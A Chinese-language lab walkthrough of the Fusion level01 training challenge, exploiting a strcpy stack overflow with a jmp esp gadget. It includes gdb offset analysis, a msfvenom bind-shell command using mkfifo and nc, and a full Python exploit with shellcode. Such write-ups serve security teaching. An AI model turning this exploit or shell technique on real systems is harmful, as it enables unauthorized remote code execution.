黑客入门之fusion level01
扫描二维码
随时随地手机看文章
http://exploit-exercises.com/fusion/level01
About
level00 with stack/heap/mmap aslr, without info leak :)
Vulnerability Type Stack
Position Independent Executable No
Read only relocations No
Non-Executable stack No
Non-Executable heap No
Address Space Layout Randomisation Yes
Source Fortification No
Source code
1#include "../common/common.c"
2
3int fix_path(char *path)
4{
5 char resolved[128];
6
7 if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open
8 strcpy(path, resolved);
9}
10
11char *parse_http_request()
12{
13 char buffer[1024];
14 char *path;
15 char *q;
16
17 // printf("[debug] buffer is at 0x%08x :-)n", buffer); :D
18
19 if(read(0, buffer, sizeof(buffer)) <= 0) errx(0, "Failed to read from remote host");
20 if(memcmp(buffer, "GET ", 4) != 0) errx(0, "Not a GET request");
21
22 path = &buffer[4];
23 q = strchr(path, ' ');
24 if(! q) errx(0, "No protocol version specified");
25 *q++ = 0;
26 if(strncmp(q, "HTTP/1.1", 8) != 0) errx(0, "Invalid protocol");
27
28 fix_path(path);
29
30 printf("trying to access %sn", path);
31
32 return path;
33}
34
35int main(int argc, char **argv, char **envp)
36{
37 int fd;
38 char *p;
39
40 background_process(NAME, UID, GID);
41 fd = serve_forever(PORT);
42 set_io(fd);
43
44 parse_http_request();
45}
这个程序中的fix_path函数,使用自己声明的一个char resolved[128];来存储用户提交的绝对路径,由于strcpy没有对长度进行检查, 所以返回的时候存在overflow。如果传递给realpath函数的第二个参数为NULL, 那么realpath内部就会使用malloc来分配一个PATH_MAX长度的缓冲区,fix_path的漏洞就不存在了。
首先可以查看一下MAX_PATH的大小
fusion@fusion:/opt/metasploit-framework$ cat /usr/include/linux/limits.h
#ifndef _LINUX_LIMITS_H
#define _LINUX_LIMITS_H
#define NR_OPEN 1024
#define NGROUPS_MAX 65536 /* supplemental group IDs are available */
#define ARG_MAX 131072 /* # bytes of args + environ for exec() */
#define LINK_MAX 127 /* # links a file may have */
#define MAX_CANON 255 /* size of the canonical input queue */
#define MAX_INPUT 255 /* size of the type-ahead buffer */
#define NAME_MAX 255 /* # chars in a file name */
#define PATH_MAX 4096 /* # chars in a path name including nul */
#define PIPE_BUF 4096 /* # bytes in atomic write to a pipe */
#define XATTR_NAME_MAX 255 /* # chars in an extended attribute name */
#define XATTR_SIZE_MAX 65536 /* size of an extended attribute value (64k) */
#define XATTR_LIST_MAX 65536 /* size of extended attribute namelist (64k) */
#define RTSIG_MAX 32
#endif
根据提示这个程序添加了ASLR的保护, 所以无法确定buffer每次运行的地址,但是我们可以使用gdb算出resolved和eip的偏移量。
ASLR is enabled by default on the system, the variable randomize_va_space is set to 2. So we have to deal with full address space randomization (stack, heap, shared libraries, etc...).
我们也可以使用脚本来检查一下这个程序的所有保护机制,不得不说这个工具真的很不错。
$ wget -q http://trapkit.de/tools/checksec.sh$ chmod +x checksec.sh
fusion@fusion:~$ ./checksec.sh --file /opt/fusion/bin/level01
RELRO STACK CANARY NX PIE RPATH RUNPATH FILE
No RELRO No canary found NX disabled No PIE No RPATH No RUNPATH /opt/fusion/bin/level01常用的保护机制都没有打开,我们看到了No PIE
fusion@fusion:~$ sudo gdb -q attach --pid 958
attach: No such file or directory.
Attaching to process 958
Reading symbols from /opt/fusion/bin/level01...done.
Reading symbols from /lib/i386-linux-gnu/libc.so.6...Reading symbols from /usr/lib/debug/lib/i386-linux-gnu/libc-2.13.so...done.
done.
Loaded symbols for /lib/i386-linux-gnu/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
0xb7754424 in __kernel_vsyscall ()
(gdb) b fix_path
Breakpoint 1 at 0x804981e: file level01/level01.c, line 7.
(gdb) set follow-fork-mode child
(gdb) c
Continuing.
我们打开另一个终端,运行下面命令
fusion@fusion:/opt/metasploit-framework$ python -c 'print "GET /" + "A"* 131 + "CCCC" + "DDDD" + " HTTP/1.1"'| nc localhost 20001回到刚才的终端,我们看到已经在函数fix_path地方停住
Breakpoint 1, fix_path (path=0xbfa5b19c "/", 'A' , "CCCCDDDD") at level01/level01.c:7
7 level01/level01.c: No such file or directory.
in level01/level01.c
(gdb) n
9 in level01/level01.c
(gdb) i r
eax 0x1 1
ecx 0xb75cf8d0 -1218643760
edx 0xbfa5b17c -1079660164
ebx 0xb7747ff4 -1217101836
esp 0xbfa5b0e0 0xbfa5b0e0
ebp 0xbfa5b178 0xbfa5b178
esi 0xbfa5b231 -1079659983
edi 0x8049ed1 134520529
eip 0x8049853 0x8049853
eflags 0x246 [ PF ZF IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) x/64wx $esp
0xbfa5b0e0: 0xbfa5b19c 0xbfa5b0f0 0x000003f3 0x00000200
0xbfa5b0f0: 0x4141412f 0x41414141 0x41414141 0x41414141
0xbfa5b100: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfa5b110: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfa5b120: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfa5b130: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfa5b140: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfa5b150: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfa5b160: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfa5b170: 0x41414141 0x43434343 0x44444444 0x08049900
0xbfa5b180: 0xbfa5b19c 0x00000020 0x00000004 0x00000000
0xbfa5b190: 0x001761e4 0xbfa5b220 0x20544547 0x4141412f
0xbfa5b1a0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfa5b1b0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfa5b1c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfa5b1d0: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb) p &resolved
$1 = (char (*)[128]) 0xbfa5b0f0
(gdb) p $ebp - 0xbfa5b0f0
$3 = (void *) 0x88
(gdb) p /d $ebp - 0xbfa5b0f0
$4 = 136
通过上面的调试, 我们可以看到ebp和resolved的offset为136, 所以保存的eip和resolved的offset为140
由于这个程序没有添加PIE的保护, 所以.text段中指令每次运行的地址是一样的,我们可以使用.text段中某一条指令的地址来覆盖返回地址, 我们使用jmp esp指令,我们不能和之前一样使用ret指令, 因为我们不知道将shellcode存储在哪里,环境变量,缓冲区等地址都是随机的。而我们可以利用jmp esp, fix_path函数执行完leave指令后,esp指向之前“保存的eip”的地址,目前被我们覆盖成jmp esp指令的地址,ret指令(pop %eip)后,esp寄存器的值+4,指向的是(saved eip) + 4, 而下一个执行的指令是jmp esp, 那么eip的值就变成了当前esp指向的地方, 如果这个地方存储shellcode, 那么就会执行我们构造的代码。
fusion@fusion:/opt/metasploit-framework$ ./msfelfscan -j esp /opt/fusion/bin/level01
[/opt/fusion/bin/level01]
0x08049f4f jmp esp
可以看到地址是0x08049f4f
现在我们开始构造我们的exploit了
格式为get + PATH + ret + shellcode + proto
使用metasploit来构造我们的shellcode
./msfvenom -p linux/x86/exec -b 'x00x20' -f c CMD="mkfifo /tmp/tmp_fifo; cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l -p 12345 > /tmp/tmp_fifo"由于fusion 自己带的nc没有-e选项, 所以不能直接执行命令, 为了返回一个shell, 我们可以参考帮助文档中的方法。-b选项是指定shellcode中不要含有的字符, 我们这里不能含有x00和x20, 否则字符串在中间就会被截断。
下面是根据生成的shellcode,构造的python脚本
#!/usr/bin/env python
get = "GET /"
PATH = "A"*135 + "FAKE"
#0x08049f4f jmp esp
ret = "x4fx9fx04x08"
proto = " HTTP/1.1"
shellcode = "x2bxc9x83xe9xe0xe8xffxffxffxffxc0x5ex81x76x0e"
shellcode += "xe4x03x5bxfax83xeexfcxe2xf4x8ex08x03x63xb6x65"
shellcode += "x33xd7x87x8axbcx92xcbx70x33xfax8cx2cx39x93x8a"
shellcode += "x8axb8xa8x0cx58x5bxfaxe4x6ex30x9cx8dx65x34xda"
shellcode += "xcbx77x36x8axcbx77x36x8axbbx65x32x9cx8bx38x7b"
shellcode += "x99x85x77x7bxd5x90x6ex2bxd5x90x6ex2bxa5x82x6a"
shellcode += "x3dx95xc4x7fx7bxd5x86x6ax35xd5x97x6bx7bxd7x8d"
shellcode += "x23x69xc4xc2x32x7bx86xc4x6dx38xdaxc9x6fx7bxd7"
shellcode += "x94x23x6axc8xd7x37x6exdaxdax23x74x8ex89x73x74"
shellcode += "x8ex89x73x04x9cx8dx65x34xfaxb3x50xd2x1bx29x83"
shellcode += "x5bxfa"
payload = get + PATH + ret + shellcode + proto
print payload
运行下面命令生成payload
fusion@fusion:~$ python pwn01.py > payload01ok, 现在开始exploit
fusion@fusion:~$ cat payload01 | nc localhost 20001
fusion@fusion:/opt/metasploit-framework$ nc localhost 12345
sh: no job control in this shell
sh-4.2$ id
id
uid=20001 gid=20001 groups=20001
打完收工!
下载文档
